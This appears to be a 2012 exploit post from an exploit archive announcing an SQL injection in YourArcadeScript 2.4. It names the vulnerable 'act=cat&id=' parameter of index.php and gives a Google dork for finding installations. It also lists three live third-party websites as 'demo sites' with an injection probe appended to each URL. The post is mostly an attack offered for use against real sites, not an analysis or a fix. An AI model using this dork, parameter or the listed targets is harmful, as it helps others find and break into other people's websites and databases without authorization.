id: 19218
date: 08/19/2012
title: YourArcadeScript 2.4 SQL Injection Vulnerability
author: DaOne
cves: 

##########################################
[~] Exploit Title: YourArcadeScript 2.4 SQLi Vulnerability
[~] Version: 2.4
[~] Date: 17/08/2012
[~] Author: DaOne  [LCA]
[~] Software Link: http://www.yourarcadescript.com
[~] Google Dork: intext:"Powered by YourArcadeScript 2.4"
##########################################
 
[#] [ Exploit ]
 
http://localhost/index.php?act=cat&id=[Error Based Injection]

[#] [ Demo Sites ]

http://nastygamesonline.com/index.php?act=cat&id=1'
http://www.games-grand.com/index.php?act=cat&id=1'
http://arcadesforyou.com/index.php?act=cat&id=1'
 
##########################################
[*] thanks to : All LibyanCA Members (^_^)
##########################################



#  0day.today [2023-03-24]  #